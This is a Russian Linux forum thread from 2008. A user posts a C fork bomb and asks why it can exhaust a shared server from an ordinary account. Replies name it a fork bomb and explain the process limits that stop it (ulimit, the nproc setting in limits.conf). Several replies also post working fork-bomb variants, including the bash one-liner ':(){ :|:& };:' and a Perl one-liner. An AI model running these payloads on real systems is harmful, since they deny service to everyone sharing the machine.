Простейший вирус для линукса

0

0

Не знаю куда писать вот и пишу сюда.

народ объясните мне плиз - есть типовая ситуация удаленный сервак на который я имею ssh доступ как рядовой пользователь и могу на нем работать как ОБЫЧНЫЙ ЮЗЕР т. е. имею право создать файл в текстовом редакторе, скомпилировать его, и запустить. Насколько я понимаю такое бывает часто и даже очень часто. (поправте меня если я не прав)

вот я и создаю такой вот примитивный файл:

#include <unistd.h>

int funct()
{
if ( fork() )
funct();
else funct();
}

int main(int argc, char *argv[])
{
funct();

return 0;
}

при удачном стечении обстоятельств можно и дерективу #include пропустить и компилер её все равно проглотит. Компилю я эту хрень и запускаю. Все после этого сервак работает еще минуту максимум после чего он занимается только тем что плодит процессы... Короче классический вариант ДОС атаки.

Теперь вопрос - неужели от этого нет защиты? Покрутил ядро на поверхности ответа не нашел...
грустно...
очень на винды похоже...

Ссылка

← Помогите установить phpmyadmin. где я натупил?))

РНР скрипт: открыть ссылку в новом окне, на весь экран →

это называется fork-бомба и противодействие этому - `man ulimit`

ale ★★
(06.01.08 22:18:16 MSK)

Ссылка

Венду форкбомбой дольше валить.

~~Sphinx~~ ★★☆☆
(06.01.08 22:22:47 MSK)

Ссылка

Алсо классика:

:(){ :|:& };:

~~Sphinx~~ ★★☆☆
(06.01.08 22:25:23 MSK)

На серверах "обычным юзерам" урезают количество одновременно запущенных процессов. Читай маны по лимитам, как тебе уже сказали.

Cy6erBr4in ★★★
(06.01.08 22:37:12 MSK)

Ссылка

vim /etc/security/limits.conf -> смотреть параметр nproc

Reset ★★★★★
(06.01.08 22:41:47 MSK)

Ссылка

Ответ на: комментарий от Sphinx 06.01.08 22:25:23 MSK

это на каком языке?

anonymous
(06.01.08 22:45:14 MSK)

Ответ на: комментарий от anonymous 06.01.08 22:45:14 MSK

это на каком языке?

man sh :)

anonymous
(06.01.08 22:48:04 MSK)

Ссылка

Ответ на: комментарий от anonymous 06.01.08 22:45:14 MSK

буш?

anonymous
(06.01.08 22:48:20 MSK)

Ответ на: комментарий от anonymous 06.01.08 22:48:20 MSK

сам ты буш

anonymous
(06.01.08 23:04:15 MSK)

Ссылка

Многобукф...

#include <unistd.h> 

main() 
{ 
 while(1)
  fork();
 return 0; 
}

Также в шедуллере кажется есть фича, согласно которой все время делится на юзверей, а внутри юзверспейса квантуется (такое бирди постил на главной)

generatorglukoff ★★
(06.01.08 23:05:02 MSK)

Ответ на: комментарий от generatorglukoff 06.01.08 23:05:02 MSK

main()
{
fork();
main();
}

почти хвостовая рекурсия :D

~~Legioner~~ ★★★★★
(07.01.08 00:12:14 MSK)

Ответ на: комментарий от Legioner 07.01.08 00:12:14 MSK

>почти хвостовая рекурсия :D

"gcc -O2" -- почему почти? :)

anonymous
(07.01.08 00:38:53 MSK)

Ссылка

Начем с того, что это не вирус.

stassats ★★★★
(07.01.08 05:01:30 MSK)

> неужели от этого нет защиты?

А ты попробуй перед запуском твоего "супервируса" выполнить команду: ulimit -u 50 и запускай свои "вирусы" на здоровье ;)

P.S.: perl -e "fork while fork" &

grad
(07.01.08 06:38:23 MSK)

Ссылка

> при удачном стечении обстоятельств

ГСМ?

anonymous
(07.01.08 10:04:09 MSK)

Ссылка

Ответ на: комментарий от stassats 07.01.08 05:01:30 MSK

ыыы ... ага, скоро тупых юзверей будут называть вирусами

fura13 ★★★
(07.01.08 10:59:49 MSK)

Ответ на: комментарий от fura13 07.01.08 10:59:49 MSK

Ага, и кошмарский в венде им будет закрывать доступ к компу. "Извините, вы превысили свой лимит процессов, ваша учетная запись анулирована. Обратитесь к администратору.".

Sidrian
(07.01.08 13:49:32 MSK)

Ссылка

Ответ на: комментарий от fura13 07.01.08 10:59:49 MSK

>скоро тупых юзверей будут называть вирусами

Это более страшная зараза

generatorglukoff ★★
(07.01.08 17:07:50 MSK)

Ссылка

Гениально!!! )))))))))

>if ( fork() ) >funct(); >else funct();

это первое, второе - это классический вариант неуча! при том это не совсем ДОС атака, хотя быть может в какой-то мере и классическая :))). Как уже сказали, это просто форк-бомба. При здравом админе она работать не будет.

Deleted
(08.01.08 11:26:29 MSK)

Ссылка

Ответ на: комментарий от fura13 07.01.08 10:59:49 MSK

> скоро тупых юзверей будут называть вирусами

Деструктивный? Деструктивный. Размножается? Размножается. Значит вирус :)

watashiwa_daredeska ★★★★
(08.01.08 12:08:47 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

← Помогите установить phpmyadmin. где я натупил?))

Development

РНР скрипт: открыть ссылку в новом окне, на весь экран →

Похожие темы